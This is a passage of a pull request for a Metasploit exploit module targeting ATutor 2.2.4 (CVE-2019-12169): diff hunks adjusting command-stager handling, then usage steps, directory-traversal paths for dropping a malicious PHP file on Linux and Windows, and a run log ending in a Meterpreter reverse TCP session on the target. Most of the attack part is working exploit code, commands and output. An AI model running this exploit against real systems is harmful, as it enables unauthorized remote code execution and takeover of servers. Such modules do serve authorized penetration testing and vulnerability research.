+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -246,11 +246,9 @@ class MetasploitModule < Msf::Exploit::Remote
       @traversal_path = datastore['FILE_TRAVERSAL_PATH']
     elsif @my_target['Platform'] == 'linux'
       @traversal_path = '../../../../../../var/www/html/'
-      datastore['CMDSTAGER::FLAVOR'] = 'bourne'
     else
       # The ATutor documentation recommends Windows users to use a XAMPP server.
       @traversal_path = '..\\..\\..\\..\\..\\../xampp\\htdocs\\'
-      datastore['CMDSTAGER::FLAVOR'] = 'vbs'
     end
 
     @traversal_path = "#{@traversal_path}#{@pl_file}"
@@ -342,7 +340,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # The module first attempts to exploit `Import New Language`. If that fails, it tries to exploit `Patcher`
     create_zip_and_upload('language')
     print_status("Executing payload via #{normalize_uri(@pl_file)}/#{@pl_command}?=<payload>...")
-    execute_cmdstager(background: true)
+    execute_cmdstager(background: true, flavor: @my_target['CmdStagerFlavor'])
     sleep(wfs_delay)
 
     # The only way to know whether or not the exploit succeeded, is by checking if a session was created
@@ -350,7 +348,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning('Failed to obtain a session when exploiting `Import New Language`.')
       create_zip_and_upload('patcher')
       print_status("Executing payload via #{normalize_uri(@pl_file)}/#{@pl_command}?=<payload>...")
-      execute_cmdstager(background: true)
+      execute_cmdstager(background: true, flavor: @my_target['CmdStagerFlavor'])
     end
   end
 end

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -357,8 +357,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # There are two vulnerable functions, the `Import New Language` function and the `Patcher` function
     # The module first attempts to exploit `Import New Language`. If that fails, it tries to exploit `Patcher`
-
-    # create_zip_and_upload('patcher')
     create_zip_and_upload('language')
     print_status("Executing payload via #{normalize_uri(@pl_file)}/#{@pl_command}?=<payload>...")
     execute_cmdstager(background: true)


### PR DESCRIPTION
## About 
This change adds a new module to /modules/exploits/multi/http/ that exploits multiple vulnerabilities ATutor 2.2.4 (and potentially ATutor 2.2.1 and 2.2.2) in order to execute arbitrary commands. The change also adds documentation for this module. The module is based on this PoC: https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit/ for CVE-2019-12169: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12169

## Vulnerable system
ATutor 2.2.4 (and potentially ATutor 2.2.1 and 2.2.2)

1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/multi/http/atutor_upload_traversal`
4. Do: `set RHOSTS [IP]`
5. Do: `set USERNAME [username for the ATutor account]`
6. Do: `set PASSWORD [password for the ATutor account]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Targets

```
   Id  Name
   --  ----
   0   Auto
   1   Linux
   2   Windows
```

## Options
### FILE_TRAVERSAL_PATH
This is the traversal path to get from the upload path to the root server directory. It is used to make sure the malicious PHP is dropped in the root server directory when the zip being uploaded to the target is unpacked on the server side. The default value for Windows targets is `..\\..\\..\\..\\..\\../xampp\\htdocs\\`. This assumes the target uses XAMPP, as recommended in the ATutor documentation. The default value for Linux targets is `../../../../../../var/www/html/`.

### PASSWORD
The password for the ATutor account to authenticate with. This option is required.

### TARGETURI
The base path to ATutor. The default value is `/ATutor/`.

### USERNAME
The username for the ATutor account to authenticate with. This option is required.

### WfsDelay
The number of seconds to wait for a session to be created. This advanced option is used by the module to verify if exploitation via the `Import New Language` function succeeded. The default value is 3.

## Scenarios
### ATutor 2.2.4 running on Windows 10 (XAMPP)
```
msf5 exploit(multi/http/atutor_upload_traversal) > show options
                                                                                                                  
Module options (exploit/multi/http/atutor_upload_traversal):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FILE_TRAVERSAL_PATH                   no        Traversal path to the root server directory. Default for Windows targets: `..\..\..\..\..\../xampp\htdocs\`. Linux Default: `../../../../../../var/www/html/.`
   PASSWORD             root             yes       Password to authenticate with
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS               192.168.1.12     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                80               yes       The target port (TCP)
   SRVHOST              0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT              8080             yes       The local port to listen on.
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /ATutor/         yes       The base path to ATutor
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME             root             yes       Username to authenticate with
   VHOST                                 no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.28     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(multi/http/atutor_upload_traversal) > run

[*] Started reverse TCP handler on 192.168.1.28:4444 
[+] Successfully authenticated as user 'root'. We have admin privileges!
[+] Identified the target OS as Win64.
[*] Setting payload to windows/x64/meterpreter/reverse_tcp.
[*] Attempting exploitation via the `Import New Language` function.
[*] Uploaded malicious PHP file vanwqiz.php.
[*] Executing payload via /vanwqiz.php/qnwgdu?=<payload>...
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201283 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.28:4444 -> 192.168.1.12:49512) at 2020-06-12 13:50:47 -0400
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
[!] Deleting malicious PHP file vanwqiz.php

meterpreter >

```
